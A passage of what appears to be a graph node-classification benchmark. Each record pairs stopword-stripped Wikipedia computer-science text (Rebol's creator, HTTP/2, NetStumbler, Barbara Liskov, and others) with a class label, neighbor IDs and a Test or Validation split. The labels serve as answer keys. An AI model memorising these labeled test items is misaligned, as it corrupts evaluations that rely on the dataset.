dynamically loaded libraries devices optional modules around core design gave amiga os great extensibility flexibility within limited memory capacity computers 1980s sassenrath later noted design came necessity trying integrate rom dozens internal libraries devices including graphics sound graphical user interface floppy disc file systems others dynamic modular method also allowed hundreds additional modules added external developers years release amiga 1985 sassenrath left commodore-amiga pursue new programming language design ideas contemplating since university days 1986 sassenrath recruited apple computer advanced technology group atg invent next generation operating systems part aquarius project quad-core cpu project simulated apple cray xmp-48 intended become 3d-based successor macintosh period c++ language introduced sassenrath along many apple researchers preferred pure oo implementation smalltalk language working atg computing legends like alan kay larry tessler dan ingalls bill atkinson others provided sassenrath wealth resources knowledge helped shape views computing languages systems 1988 sassenrath left silicon valley mountains ukiah valley 2 hours north san francisco founded multimedia technology companies pantaray american multimedia videostream also implemented logo programming language amiga managed software os development cdtv one first cd-rom tv set-top boxes wrote os viscorp ed one first internet tv set-top boxes 1996 watching growth development programming languages like java perl python sassenrath decided publish ideas within world computer languages result rebol relative expression-based object language rebol intended lightweight specifically support efficient distributed computing sassenrath describes rebol balance concepts context symbolism allowing users create new relationships symbols meanings attempts merge concepts code data metadata sassenrath considers rebol experimental provides greater control context programming languages words used form different grammars different contexts called dialecting sassenrath claims rebol ultimate endpoint evolution markup language methodologies xml 1998 sassenrath founded rebol technologies company still runs company released several versions rebol produced additional products rebol/view rebol/command rebol/sdk rebol/ios sassenrath implemented rebol v3.0 released github december 12 2012 https //github.com/rebol/r3 sassenrath principal engineer roku inc. sassenrath lives ukiah california grows grapes makes wine interested amateur radio video production quantum electrodynamics boating volunteers television improvement association community organization brings free over-the-air television broadcasts ukiah area",
    "neighbors": [
      4998,
      8582,
      5384,
      7432,
      6415,
      7187,
      1952,
      9762,
      5029,
      2345,
      428,
      5677,
      7983,
      1469,
      3904,
      9665,
      8262,
      8524,
      9166,
      850,
      11221,
      479,
      9441,
      6502,
      8554,
      1389,
      9454,
      11123,
      1278,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 59,
    "label": 2,
    "text": "BLAG_Linux_and_GNU:blag linux gnu blag linux gnu linux distribution made brixton linux action group blag single-cd distro applications desktop users expect desktop including multimedia graphics desktop internet applications blag also included collection server packages blag based fedora plus updates adds apps dag dries freshrpms newrpms includes custom packages blag one operating systems listed completely free software distribution free software foundation first public release blag 22 october 2002 latest stable release blag 140k based fedora 14 released 4 may 2011 october 2014 blag 200000 released alpha form planning blag 240000 commenced january 2016 never released script used blag cleaning kernel non-free blobs shipped default used base linux-libre set scripts",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      561,
      56,
      3129,
      4153,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      2134,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      9564,
      4961,
      2914,
      8033,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      4493,
      10127,
      912,
      1939,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 60,
    "label": 9,
    "text": "Embedded_style_language:embedded style language embedded style language kind computer language whose commands appear intermixed base language languages either syntax translated base language provide api invoke behaviors language embedded domain-specific languages common examples embedded style languages rely upon translation posix threads example embedded style language uses api invoke behaviors embedded style languages invoked via api distinguished software libraries existence runtime system",
    "neighbors": [
      3413,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 61,
    "label": 4,
    "text": "NetStumbler:netstumbler netstumbler also known network stumbler tool windows facilitates detection wireless lans using 802.11b 802.11a 802.11g wlan standards runs microsoft windows operating systems windows 2000 windows xp trimmed-down version called ministumbler available handheld windows ce operating system program commonly used updated version developed since 2005",
    "neighbors": [
      321,
      6375,
      6797,
      7983,
      7222,
      8922,
      11165
    ],
    "mask": "Validation"
  },
  {
    "node_id": 62,
    "label": 4,
    "text": "IEC_62351:iec 62351 iec 62351 standard developed wg15 iec tc57 developed handling security tc 57 series protocols including iec 60870-5 series iec 60870-6 series iec 61850 series iec 61970 series iec 61968 series different security objectives include authentication data transfer digital signatures ensuring authenticated access prevention eavesdropping prevention playback spoofing intrusion detection",
    "neighbors": [
      513,
      11267,
      4359,
      9744,
      8854,
      10908,
      6062,
      7985,
      4163,
      2117,
      8904,
      10831,
      1616,
      2519,
      4064,
      2030,
      3447,
      11387,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 63,
    "label": 3,
    "text": "List_of_OpenCL_applications:list opencl applications following list contains list computer programs built take advantage opencl webcl heterogeneous compute framework collection opencl examples",
    "neighbors": [
      6268,
      4140,
      733,
      11406
    ],
    "mask": "Test"
  },
  {
    "node_id": 64,
    "label": 5,
    "text": "HTTP/2:http/2 http/2 originally named http/2.0 major revision http network protocol used world wide web derived earlier experimental spdy protocol originally developed google http/2 developed hypertext transfer protocol working group httpbis means second internet engineering task force http/2 first new version http since http 1.1 standardized rfc 2068 1997 working group presented http/2 iesg consideration proposed standard december 2014 iesg approved publish proposed standard february 17 2015 http/2 specification published rfc 7540 may 2015 standardization effort supported chrome opera firefox internet explorer 11 safari amazon silk edge browsers major browsers added http/2 support end 2015 according w3techs 40.1 top 10 million websites supported http/2 proposed successor http/3 forthcoming new major revision http protocol builds concepts established http/2 working group charter mentions several goals issues concern proposed changes require changes existing web applications work new applications take advantage new features increased speed http/2 leaves http 1.1 high-level syntax methods status codes header fields uris new data framed transported client server websites efficient minimize number requests required render entire page minifying reducing amount code packing smaller pieces code bundles without reducing ability function resources images scripts however minification necessarily convenient efficient may still require separate http connections get page minified resources http/2 allows server push content respond data queries client requested allows server supply data knows web browser need render web page without waiting browser examine first response without overhead additional request cycle additional performance improvements first draft http/2 copy spdy come multiplexing requests responses avoid head-of-line blocking problem http 1 even http pipelining used header compression prioritization requests however http/2 runs top single tcp connection still potential head-of-line blocking occur tcp packets lost delayed transmission http/2 longer supports http 1.1 chunked transfer encoding mechanism provides efficient mechanisms data streaming spdy pronounced like speedy previous http-replacement protocol developed research project spearheaded google primarily focused reducing latency spdy uses tcp pipe different protocols accomplish reduction basic changes made http 1.1 create spdy included true request pipelining without fifo restrictions message framing mechanism simplify client server development mandatory compression including headers priority scheduling even bi-directional communication httpbis working group considered google spdy protocol microsoft http speed+mobility proposal spdy based network-friendly http upgrade july 2012 facebook provided feedback proposals recommended http/2 based spdy initial draft http/2 published november 2012 based straight copy spdy biggest difference http/1.1 spdy user action spdy given stream id meaning single tcp channel connecting user server spdy split requests either control data using simple parse binary protocol two types frames spdy showed evident improvement http new page load speedup ranging 11.81 47.7 development http/2 used spdy jumping-off point among many detailed differences protocols notable http/2 uses fixed huffman code-based header compression algorithm instead spdy dynamic stream-based compression helps reduce potential compression oracle attacks protocol crime attack february 9 2015 google announced plans remove support spdy chrome favor support http/2 took effect starting chrome 51 http/2 defined http uris i.e without encryption https uris tls using alpn extension tls 1.2 newer required although standard require usage encryption ref name= http/2 frequently asked questions /ref major client implementations firefox chrome safari opera ie edge stated support http/2 tls makes encryption de facto mandatory http/2 development process protocol faced criticism freebsd varnish developer poul-henning kamp asserts standard prepared unrealistically short schedule ruling basis new http/2 spdy protocol resulting missed opportunities improvement kamp criticizes protocol inconsistent needless overwhelming complexity also states protocol violates protocol layering principle example duplicating flow control belongs transport layer tcp concerns however related encryption issues initially members working group tried introduce encryption requirement protocol faced criticism critics stated encryption non-negligible computing costs many http applications actually need encryption providers desire spend additional resources encryption proponents stated encryption overhead negligible practice poul-henning kamp criticised ietf following particular political agenda http/2 criticism agenda mandatory encryption within existing certificate framework new unique members open-source community cisco employee stated 2013 present certificate model compatible small devices like routers present model requires annual enrollment remission non-trivial fees certificate must continually repeated annual basis working group finally reach consensus mandatory encryption although client implementations require makes encryption de facto requirement http/2 protocol also faced criticism supporting opportunistic encryption measure passive monitoring similar starttls mechanism long available internet protocols like smtp critics stated http/2 proposal goes violation ietf rfc7258 pervasive monitoring attack also status best current practice 188 rfc7258/bcp188 mandates passive monitoring considered attack protocols designed ietf take steps protect passive monitoring example use opportunistic encryption number specifications opportunistic encryption http/2 provided draft-nottingham-http2-encryption adopted official work item working group leading publication rfc 8164 may 2017 although design http/2 effectively addresses http-transaction-level head-of-line blocking problem allowing multiple concurrent http transactions transactions multiplexed single tcp connection meaning packet-level head-of-line blocking tcp stream simultaneously blocks transactions accessed via connection head-of-line blocking http/2 widely regarded design flaw much effort behind quic http/3 devoted reduce head-of-line blocking issues",
    "neighbors": [
      513,
      6657,
      3592,
      9736,
      2579,
      4629,
      6171,
      9757,
      7713,
      10791,
      9770,
      3629,
      559,
      2098,
      4661,
      3639,
      10808,
      5178,
      3643,
      9275,
      4158,
      65,
      5707,
      10831,
      10834,
      6231,
      8281,
      9306,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      4725,
      119,
      4728,
      6265,
      3707,
      637,
      1664,
      10368,
      2182,
      2205,
      10910,
      8351,
      3744,
      3237,
      9387,
      7340,
      10924,
      6319,
      9394,
      9908,
      9909,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      225,
      737,
      4326,
      9465,
      8443,
      8956,
      9987,
      7943,
      1802,
      278,
      7965,
      3876,
      8998,
      1834,
      10033,
      6456,
      10057,
      11082,
      2893,
      3920,
      6993,
      1363,
      4439,
      865,
      9580,
      8557,
      5491,
      7035,
      10622,
      6528,
      3971,
      3462,
      8584,
      1935,
      7567,
      9616,
      7572,
      4505,
      5026,
      944,
      2994,
      5054,
      6086,
      4048,
      5078,
      3545,
      479,
      10722,
      5605,
      487,
      8169,
      8170,
      494,
      5102,
      1520,
      7152,
      8176,
      6133,
      5622,
      5114,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 65,
    "label": 9,
    "text": "Minification_(programming):minification programming minification also minimisation minimization process removing unnecessary characters source codes interpreted programming languages markup languages without changing functionality unnecessary characters usually include white space characters new line characters comments sometimes block delimiters used add readability code required execute minification reduces size source code making transmission network e.g internet efficient programmer culture aiming extremely minified source code purpose recreational code golf competitions minification must confused obfuscation former readily reversed using pretty-printer minification distinguished general concept data compression minified source interpreted immediately without need uncompression step interpreter work original well minified source example javascript code equivalent longer 2001 douglas crockford introduced jsmin removed comments whitespace javascript code followed yui compressor 2007 2009 google opened closure toolkit including closure compiler contained source mapping feature together firefox extension called closure inspector 2010 mihai bazon introduced uglifyjs superseded uglifyjs2 2012 rewrite allow source map support source maps allow tools display unminified code minified code optimized mapping original format created joseph schorr part closure inspector minification project updates versions 2 3 reduced size map files visual studio code comes minification support several languages readily browse visual studio marketplace download install additional minifiers javascript optimizers minify generate source maps include uglifyjs google closure compiler addition certain online tools microsoft ajax minifier yahoo yui compressor pretty diff compress css files minification html code following tools htmlcompressor htmlminifier webmarkupmin power-shell script named minifyps able shrink powershell script code well javascript code free online tool minify js uglifyjs ability combine multiple files blimptontech.com components libraries web applications websites developed optimize file requests reduce page load times shrinking size various files javascript cascading style sheet css resources may minified preserving behavior considerably reducing file size libraries available online capable minification optimization varying degrees libraries also merge multiple script files single file client download javascript source maps make code readable debuggable even combined minified",
    "neighbors": [
      64,
      10624,
      803,
      3462,
      8171,
      9195,
      10507,
      3187,
      5395,
      8923
    ],
    "mask": "Test"
  },
  {
    "node_id": 66,
    "label": 1,
    "text": "National_Academic_Depository:national academic depository national academic depository nad digital database academic awards provided government india nad inter-operable system storage retrieval authentication verification academic awards nad allows logging academic awards addition ensuring authenticity integrity confidentiality database nad act deterrent fake forged paper certificates reduce administrative efforts eliminate need institutions preserve physical records academic institutions held responsible authenticity nad data requests access academic awards potential employers require consent recipient academic institutions include following national academic depository bill originally introduced lok sabha 5 september 2011 former human resource development minister shri kapil sibal bill referred standing committee human resource development law lapsed 2014 change government union cabinet prime minister shri narendra modi approved ministry human resource development proposal nad establishment operation 27 october 2016 serviced nsdl database management limited ndml cdsl ventures ltd. cvl – wholly owned subsidiaries depositories registered securities exchange board india sebi act 1992 fulfilment commitment made finance minister budget speech 2016-17 government designated university grants commission ugc authorized body enter tripartite agreement ndml cvl nad bill proposed make mandatory specified academic institutions log every academic award system established network facilitation centers candidates submit dematerialization requests past academic certificates applications educational institutions may become depository agents system would necessary security ensure authorized users access expenditure government side expected would charge-based service provision users represented educational institutions employers stakeholders present academic institutions authorized upload certificates nad 24 may 2019",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 67,
    "label": 5,
    "text": "Analog_transmission:analog transmission analog transmission transmission method conveying information using continuous signal varies amplitude phase property proportion information could transfer analog source signal using analog modulation method frequency modulation fm amplitude modulation modulation textbooks also consider passband data transmission using digital modulation method ask psk qam i.e sinewave modulated digital bit-stream analog transmission analog signal others define digital transmission digital signal baseband data transmission using line codes resulting pulse train always considered digital transmission although source signal may digitized analog signal analog transmission conveyed many different fashions two basic kinds analog transmission based modulate data combine input signal carrier signal usually carrier signal specific frequency data transmitted variations two techniques amplitude modulation varies amplitude carrier signal frequency modulation fm modulates frequency carrier analog transmissions fall one several categories telephony voice communication originally primarily analog nature television radio transmission early telecommunication devices utilized analog-to-digital conversion devices called modulator/demodulators modems convert analog signals digital signals back analog transmission method still popular particular shorter distances due significantly lower costs complex multiplexing timing equipment unnecessary small short-haul systems simply need multiplexed digital transmission however situations signal often high signal-to-noise ratio achieve source linearity long distance high output systems analog unattractive due attenuation problems furthermore digital techniques continue refined analog systems increasingly becoming legacy equipment recently nations netherlands completely ceased analog transmissions analogue switch-off certain media television purposes government saving money",
    "neighbors": [
      2968,
      7400,
      3040
    ],
    "mask": "None"
  },
  {
    "node_id": 68,
    "label": 9,
    "text": "Visual_modeling:visual modeling visual modeling graphic representation objects systems interest using graphical languages visual modeling languages may general-purpose modeling gpm languages e.g. uml southbeach notation idef domain-specific modeling dsm languages e.g. sysml include industry open standards e.g. uml sysml modelica well proprietary standards visual languages associated vissim matlab simulink opnet netsim ni multisim reactive blocks vissim reactive blocks provide royalty-free downloadable viewer lets anyone open interactively simulate models community edition reactive blocks also allows full editing models well compilation long work published eclipse public license visual modeling languages area active research continues evolve evidenced increasing interest dsm languages visual requirements visual owl web ontology language",
    "neighbors": [
      9376,
      2242,
      1917,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 69,
    "label": 2,
    "text": "One_UI:one ui one ui software overlay developed samsung electronics android devices succeeding samsung experience touchwiz designed streamlined specific optimizations ease one-handed use smartphones large screens unveiled samsung developer conference 2018 first introduced part samsung firmware updates android 9 pie one ui designed part goal make samsung hardware software work together perfect harmony provide natural experience large-screen smartphones prominent design pattern included applications intentionally place common features user interface elements along bottom screen rather near top makes easier reach user thumb using device one-handed similar reasons apps utilise large headers push main content towards vertical centre screen navigation bar supports use gestures system-wide night mode also added gives ui elements supported applications darkened color scheme android pie upstream overview screen recent apps uses horizontal layout opposed vertical layout previous versions one ui included new android devices released samsung since beginning 2019 including galaxy s10 series galaxy 2019 series galaxy note 10 series one ui released existing samsung devices throughout 2019 part updates android 9 pie beginning galaxy s9 galaxy note 9 january 2019 galaxy s8 note 8 february 2019 galaxy note fan edition march 2019 galaxy s7 april 2019 unofficialy portage galaxy note fan edition portage various mid-range low-end models particularly galaxy galaxy j series models released since 2017 middle year selected galaxy tab models late-2019 samsung launched public beta one ui updates november 2018",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      6212,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      5363,
      6391,
      5892,
      7428,
      2828,
      5397,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      823,
      5431,
      2875,
      3900,
      7483,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      10080,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 70,
    "label": 9,
    "text": "Barbara_Liskov:barbara liskov barbara liskov born november 7 1939 barbara jane huberman american computer scientist institute professor massachusetts institute technology ford professor engineering school engineering electrical engineering computer science department one first women granted doctorate computer science united states turing award winner developed liskov substitution principle liskov born november 7 1939 los angeles california eldest jane née dickhoff moses huberman four children earned ba mathematics minor physics university california berkeley 1961 classes one female classmate rest male graduated applied graduate mathematics programs berkeley princeton time princeton accepting female students mathematics accepted berkeley instead studying moved boston began working mitre corporation became interested computers programming worked mitre one year taking programming job harvard worked language translation decided go back school applied berkeley also stanford harvard 1968 became one first women united states awarded ph.d computer science department awarded degree stanford university stanford worked john mccarthy supported work artificial intelligence topic ph.d. thesis computer program play chess endgames graduating stanford liskov returned mitre work research staff liskov led many significant projects including venus operating system small low-cost interactive timesharing system design implementation clu argus first high-level language support implementation distributed programs demonstrate technique promise pipelining thor object-oriented database system jeannette wing developed particular definition subtyping commonly known liskov substitution principle leads programming methodology group mit current research focus byzantine fault tolerance distributed computing liskov member national academy engineering national academy sciences fellow american academy arts sciences association computing machinery acm 2002 recognized one top women faculty members mit among top 50 faculty members sciences u.s 2002 discover magazine recognized liskov one 50 important women science 2004 barbara liskov john von neumann medal fundamental contributions programming languages programming methodology distributed systems 19 november 2005 barbara liskov donald e. knuth awarded eth honorary doctorates liskov knuth also featured eth zurich distinguished colloquium series 2018 awarded doctor honoris causa universidad politécnica de madrid liskov received 2008 turing award acm march 2009 work design programming languages software methodology led development object-oriented programming specifically liskov developed two programming languages clu 1970s argus 1980s acm cited contributions practical theoretical foundations programming language system design especially related data abstraction fault tolerance distributed computing 2012 inducted national inventors hall fame barbara liskov author three books one hundred technical papers 1970 married nathan liskov son moses liskov born 1975",
    "neighbors": [
      7048,
      8201,
      11020,
      10668,
      7085,
      7983,
      2482,
      1976,
      2617,
      10043,
      4799,
      4800,
      10049,
      4930,
      3529,
      7499,
      2901,
      1883,
      4572,
      7775,
      9315,
      11242,
      2283,
      2798,
      1783,
      121,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 71,
    "label": 5,
    "text": "DHCP_snooping:dhcp snooping computer networking dhcp snooping series techniques applied improve security dhcp infrastructure dhcp servers allocating ip addresses clients lan dhcp snooping configured lan switches prevent malicious malformed dhcp traffic rogue dhcp servers addition information hosts successfully completed dhcp transaction accrued database bindings may used security accounting features features may use dhcp snooping database information ensure ip integrity layer 2 switched domain information enables network",
    "neighbors": [
      7240,
      4490,
      2996,
      9524,
      7865,
      5437
    ],
    "mask": "Validation"
  },
  {
    "node_id": 72,
    "label": 1,
    "text": "Datasource:datasource datasource name given connection set database server name commonly used creating query database data source name dsn need filename database example database file named friends.mdb could set dsn school dsn school would used refer database performing query factory connections physical data source datasource object represents alternative drivermanager facility datasource object preferred means getting connection object implements datasource interface typically registered naming service based java naming directory interface jndi api datasource interface implemented driver vendor three types implementations datasource object properties modified necessary example data source moved different server property server changed benefit data source properties changed code accessing data source need changed driver accessed via datasource object register drivermanager rather datasource object retrieved lookup operation used create connection object basic implementation connection obtained datasource object identical connection obtained drivermanager facility datasource object representation data source java programming language basic terms data source facility storing data sophisticated complex database large corporation simple file rows columns data source reside remote server local desktop machine applications access data source using connection datasource object thought factory connections particular data source datasource instance represents datasource interface provides two methods establishing connection data source using datasource object preferred alternative using drivermanager establishing connection data source similar extent drivermanager class datasource interface methods creating connection methods getting setting timeout limit making connection methods getting setting stream logging differences significant similarities however unlike drivermanager datasource object properties identify describe data source represents also datasource object works java naming directory interface jndi naming service created deployed managed separately applications use driver vendor provide class basic implementation datasource interface part java database connectivity jdbc 2.0 3.0 driver product system administrator register datasource object jndi naming service application get connection data source using datasource object registered jndi naming service described later chapter registered jndi naming service gives datasource object two major advantages drivermanager first application need hardcode driver information drivermanager programmer choose logical name data source register logical name jndi naming service application uses logical name jndi naming service supply datasource object associated logical name datasource object used create connection data source represents second major advantage datasource facility allows developers implement datasource class take advantage features like connection pooling distributed transactions connection pooling increase performance dramatically reusing connections rather creating new physical connection time connection requested ability use distributed transactions enables application heavy duty database work large enterprises although application may use either drivermanager datasource object get connection using datasource object offers significant advantages recommended way establish connection since 1.4 since java ee 6 jndi-bound datasource alternatively configured declarative way directly within application alternative particularly useful self-sufficient applications transparently using embedded database datasource abstract representation live set data presents common predictable api objects interact nature data quantity complexity logic returning query results play role determining type datasource small amounts simple textual data javascript array good choice data small footprint requires simple computational transformational filter displayed javascript function may right approach large datasets—for example robust relational database—or access third-party webservice 'll certainly need leverage power script node xhr datasource",
    "neighbors": [
      2688,
      3462,
      9481,
      10505,
      1035,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5677,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      3519,
      4416,
      2369,
      5441,
      9663,
      11457,
      8518,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      7523,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 73,
    "label": 9,
    "text": "Device_independent_file_format:device independent file format device independent file format dvi output file format tex typesetting program designed david r. fuchs implemented donald e. knuth 1982 unlike tex markup files used generate dvi files intended human-readable consist binary data describing visual layout document manner reliant specific image format display hardware printer dvi files typically used input second program called dvi driver translates dvi files graphical data example tex software packages include program previewing dvi files user computer display program driver drivers also used convert dvi popular page description languages e.g postscript pdf printing tex markup may least partially reverse-engineered dvi files although process unlikely produce high-level constructs identical present original markup especially original markup used high-level tex extensions e.g latex dvi differs postscript pdf support form font embedding postscript pdf formats either embed fonts inside documents reference external ones dvi file printed even properly previewed fonts references must already installed also unlike postscript like pdf dvi full turing-complete programming language though use limited sort machine language 2004 compilation specifications dvi driver must implement tug dvi driver standards committee seems based tugboat article name 1992 much shorter documents specify endianness however big endian seen looking dvi file dvi format designed compact easily machine-readable toward end dvi file sequence commands form machine-like language knuth words command begins eight-bit opcode followed zero bytes parameters example opcode group 0x00 0x7f decimal 127 set_char_ typesets single character moves implicit cursor right character width contrast opcode 0xf7 decimal 247 pre preamble must first opcode dvi file takes least fourteen bytes parameters plus optional comment 255 bytes broader sense dvi file consists preamble one pages postamble six state variables maintained tuple signed 32-bit integers formula_1 h v current horizontal vertical offsets upper-left corner increasing v moves page w x hold horizontal space values z vertical variables pushed popped stack addition current font f held integer value pushed popped rest state variables opcodes codice_1 codice_2 encountered font spacing information loaded tfm files fonts embedded dvi file referenced integer value defined relevant codice_3 op done exactly twice loaded font referenced postamble f contains integer value four bytes length though practice tex ever outputs font numbers range 0 255 similarly dvi format supports character codes four bytes length even though 0–255 range commonly seen tfm format limited range character codes dvi files refer character encoding current font rather system processing means instance ebcdic-based system process dvi file generated ascii-based system long fonts installed dvi format support graphics except basic black-and-white boxes instead dvi general escape/extension mechanism known specials expressed codice_4 command tex defers graphics color post-processing filters numerous dvi specials notable postscript specials programs like tpic dvi files often converted pdf postscript pcl format reading printing also viewed directly using dvi viewers first dvi previewers capable on-screen previewing modification latex documents ran amigas dvipdf tool translate dvi files generated tex pdf files current linux distributions like ubuntu thin wrapper around dvips ghostscript copyrighted artifex software makers ghostscript possibly different program name—described modified version dvips—was announced late 1990s sergey lesenko however apparently never released dvipdfm dvi-to-pdf translator developed mark a. wicks early documentation dvipdfm specifically mentions limited availability lesenko dvipdf reason creating dvipdfm dvipdfm supports newer special functions pdf format including bookmarks annotations thumbnails dvips specials—a feature making possible inclusion encapsulated postscript .eps files like metapost output—as well inclusion jpeg png images features dvipdfm include partial font embedding reducing file size balancing internal pdf document trees speed rendering large documents many features except direct support .eps files also present pdftex typesets tex directly pdf 2004 4th edition guide latex compares following way dvipdfmx extended version dvipdfm dvi-to-pdf translator included current tex distributions like tex live 2014 miktex 2.9 primary goal dvipdfmx project support multi-byte character encodings cjk character sets east asian languages dvipdfmx also included somewhat modified form xetex 2nd 2008 edition latex graphics companion makes following workflow suggestion",
    "neighbors": [
      9192,
      1609,
      10953,
      2798,
      6830,
      10352,
      3921,
      3443,
      372,
      3828,
      8627,
      8628,
      345,
      8763,
      1822
    ],
    "mask": "None"
  },
  {
    "node_id": 74,
    "label": 3,
    "text": "Quil_(instruction_set_architecture):quil instruction set architecture quil quantum instruction set architecture first introduced shared quantum/classical memory model introduced robert smith michael curtis william zeng practical quantum instruction set architecture many quantum algorithms including quantum teleportation quantum error correction simulation optimization algorithms require shared memory architecture quil developed superconducting quantum processors developed rigetti computing forest quantum programming api python library called codice_1 introduced develop quil programs higher level constructs quil backend also supported quantum programming environments paper presented smith curtis zeng quil specifies instruction set quantum abstract machine qam akin turing machine yet practical accomplishing real-world tasks state qam represented 6-tuple formula_1 sematics qam defined using tensor products hilbert spaces linear maps quil support defining possibly parametrized gates matrix form language include way verify matrices unitary necessary condition physical realizability defined gate application qubits language also supports macro-like definitions possibly parametrized quantum circuits expansion qubit measurement recording outcome classical memory synchronization classical computers codice_3 instruction pauses execution quil program classical program ended execution conditional unconditional branching pragma support well inclusion files use libraries standard set gates provided one libraries rigetti computing developed quantum virtual machine common lisp simulates defined quantum abstract machine classical computer capable parsing execution quil programs possibly remote execution via http following example demonstrates classical control flow needed quantum teleportation qubit register 2 register 1 declare ro bit 2 h 0 cnot 0 1 cnot 2 0 h 2 measure 2 ro 0 measure 0 ro 1 jump-unless skip ro 1 x 1 label skip jump-unless end ro 0 z 1 label end examples implementations quantum fourier transform variational quantum eigensolver given paper",
    "neighbors": [
      9801,
      8554,
      9739,
      9911,
      10796,
      5358,
      2062,
      2804,
      5399,
      2680,
      10555,
      2781
    ],
    "mask": "None"
  },
  {
    "node_id": 75,
    "label": 9,
    "text": "FMSLogo:fmslogo fmslogo free implementation computing environment called logo educational interpreter language gui extensions developed george mills mit core ucblogo brian harvey free software source available written borland c++ wxwidgets fmslogo supports multiple turtles 3d graphics fmslogo allows input com ports lpt ports fmslogo also supports windows interface thus i/o available gui- keyboard mouse events trigger interrupts simple gif animations may also produced gifsave command jim muller wrote great logo adventure complete logo manual using mswlogo demonstration language fmslogo evolved mswlogo educational programming environment free open source implementation logo programming language microsoft windows released gpl mainly developed maintained david costanzo fmslogo following support various functionality",
    "neighbors": [
      6594,
      6797,
      7983,
      1301,
      9975,
      4633,
      6906,
      6556
    ],
    "mask": "Test"
  },
  {
    "node_id": 76,
    "label": 5,
    "text": "IceWarp_Mail_Server:icewarp mail server icewarp mail server business email collaboration server developed icewarp ltd features email custom domain shared calendars documents editing messaging advanced tool team collaboration run cloud local server using either windows linux together another solution hybrid deployment 2006 known merak mail server incorporates groupware capabilities syncml protocol well smtp imap pop protocols integrated modules including groupware antispam antivirus",
    "neighbors": [
      471,
      5063,
      10248,
      11500,
      6797,
      5230,
      7983,
      9909,
      823,
      412,
      2748,
      4439
    ],
    "mask": "Test"
  },
  {
    "node_id": 77,
    "label": 8,
    "text": "Texts_From_Last_Night:texts last night texts last night tfln regularly updated blog re-posts short text messages submitted users site tends post texts shocking scandalous texts sent people wake morning find regrettable messages sent mobile phones receiver sends allegedly discovered text website copies messages show phone numbers area codes since texts often similar late night drunk dials 're often graphic sexual nature thus safe work sociological perspective website living document twentysomething life 2009 tfln many blackout drinking sex vomit stories also extended discussion taking place morality texts show humans interact drugs alcohol see cause effect last night ’ party see real-time weighing actions however concern peoples actions texts affected existence website popularity six months website went two creators tfln signed deal pen book wherein use entertaining texts book published gotham books part penguin group erin malone william morris endeavor also helped blogs translate books including stuff white people like book awesome soul pancake since content already written book described bathroom reading expected published trade paperback beginning 2010 deadline hollywood reported october 2011 new comedy television series based blog development fox ugly betty developer silvio horta helm texts last night also mobile applications android blackberry iphone browse submit text messages",
    "neighbors": [
      2208,
      9732,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 78,
    "label": 3,
    "text": "Metcalfe's_law:metcalfe law metcalfe law states effect telecommunications network proportional square number connected users system n first formulated form george gilder 1993 attributed robert metcalfe regard ethernet metcalfe law originally presented c. 1980 terms users rather compatible communicating devices example fax machines telephones etc. later globalization internet law carry users networks original intent describe ethernet purchases connections metcalfe law characterizes many network effects communication technologies networks internet social networking world wide web former chairman u.s. federal communications commission reed hundt said law gives understanding workings internet metcalfe law related fact number unique possible connections network formula_1 nodes expressed mathematically triangular number formula_2 asymptotically proportional formula_3 law often illustrated using example fax machines single fax machine useless value every fax machine increases total number fax machines network total number people user may send receive documents increases likewise social networks greater number users service valuable service becomes community addition difficulty quantifying value network mathematical justification metcalfe law measures potential number contacts i.e. technological side network however social utility network depends upon number nodes contact language barriers reasons large parts network contact parts effect may smaller metcalfe ’ law assumes value node n equal benefit case example one fax machines serves 50 workers company second fax machine serves half third one third relative value additional connection decreases likewise social networks users join later use network less early adopters benefit additional user may lessen making overall network less efficient costs per users fixed within context social networks many including metcalfe proposed modified models value network grows n log n rather n reed odlyzko sought possible 